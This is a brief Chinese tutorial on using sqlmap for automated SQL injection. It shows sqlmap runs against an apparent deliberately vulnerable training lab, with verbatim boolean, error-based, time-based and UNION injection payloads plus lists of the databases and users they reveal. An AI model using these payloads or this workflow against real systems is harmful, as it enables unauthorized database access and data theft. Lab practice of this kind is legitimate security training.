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SQLmap 自动注入 -02

1: 如果想获得SQL 数据库的信息,可以加入参数: -dbs

sqlmap -u "" --batch -p username -dbs  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:07:47 /2025-01-21/

[06:07:47] [INFO] resuming back-end DBMS 'mysql'

[06:07:47] [INFO] testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=vpgtsrbl91e...40rho4rej4;showhints=1'). Do you want to use those [Y/n] Y

sqlmap resumed the following injection point(s) from stored session:


Parameter: username (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

    Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

    Type: UNION query

    Title: MySQL UNION query (NULL) - 7 columns

    Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details


[06:07:48] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

[06:07:48] [INFO] fetching database names

[06:07:50] [WARNING] reflective value(s) found and filtering out

available databases [34]:

[*] .svn

[*] bricks

[*] bwapp

[*] citizens

[*] cryptomg

[*] dvwa

[*] gallery2

[*] getboo

[*] ghost

[*] gtd-php

[*] hex

[*] information_schema

[*] isp

[*] joomla

[*] mutillidae

[*] mysql

[*] nowasp

[*] orangehrm

[*] personalblog

[*] peruggia

[*] phpbb

[*] phpmyadmin

[*] proxy

[*] rentnet

[*] sqlol

[*] tikiwiki

[*] vicnum

[*] wackopicko

[*] wavsepdb

[*] webcal

[*] webgoat_coins

[*] wordpress

[*] wraithlogin

[*] yazd

[06:07:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'

[06:07:52] [WARNING] your sqlmap version is outdated

[*] ending @ 06:07:52 /2025-01-21/




[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:11:28 /2025-01-21/

[06:11:29] [INFO] resuming back-end DBMS 'mysql'

[06:11:29] [INFO] testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfganof3ik5...ukdpgiq063;showhints=1'). Do you want to use those [Y/n] Y

sqlmap resumed the following injection point(s) from stored session:


Parameter: username (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

    Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

    Type: UNION query

    Title: MySQL UNION query (NULL) - 7 columns

    Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details


[06:11:30] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP 5.3.2, PHP

back-end DBMS: MySQL >= 5.0

[06:11:30] [INFO] fetching database users

[06:11:32] [WARNING] reflective value(s) found and filtering out

database management system users [38]:

[*] 'bricks'@'%'

[*] 'bwapp'@'%'

[*] 'citizens'@'localhost'

[*] 'cryptomg'@'%'

[*] 'debian-sys-maint'@'localhost'

[*] 'dvwa'@'%'

[*] 'gallery2'@'localhost'

[*] 'getboo'@'%'

[*] 'ghost'@'%'

[*] 'gtd-php'@'%'

[*] 'hex'@'localhost'

[*] 'joomla'@'localhost'

[*] 'jotto'@'%'

[*] 'kbloom'@'localhost'

[*] 'mutillidae'@'%'

[*] 'orangehrm'@'%'

[*] 'personalblog'@'%'

[*] 'peruggia'@'%'

[*] 'phpbb'@'%'

[*] 'phpmyadmin'@'localhost'

[*] 'root'@''

[*] 'root'@'brokenwebapps'

[*] 'root'@'localhost'

[*] 'sendmail'@'localhost'

[*] 'sqlol'@'%'

[*] 'stealth'@'localhost'

[*] 'tikiwiki'@'localhost'

[*] 'undertaker'@'localhost'

[*] 'vicnum'@'localhost'

[*] 'wackopicko'@'%'

[*] 'wavsep'@'localhost'

[*] 'webcal'@'localhost'

[*] 'webgoat.net'@'%'

[*] 'webmaster'@'localhost'

[*] 'wordpress'@'%'

[*] 'wraith'@'localhost'

[*] 'yazd'@'%'

[*] 'yazd10'@'%'

[06:11:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'

[06:11:34] [WARNING] your sqlmap version is outdated

[*] ending @ 06:11:34 /2025-01-21/


[06:19:04] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

[06:19:04] [INFO] fetching current user

[06:19:06] [WARNING] reflective value(s) found and filtering out

current user: 'mutillidae@%'

[06:19:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'

[06:19:06] [WARNING] your sqlmap version is outdated

[*] ending @ 06:19:06 /2025-01-21/

参考文献: 16.SQL注入攻击_哔哩哔哩_bilibili



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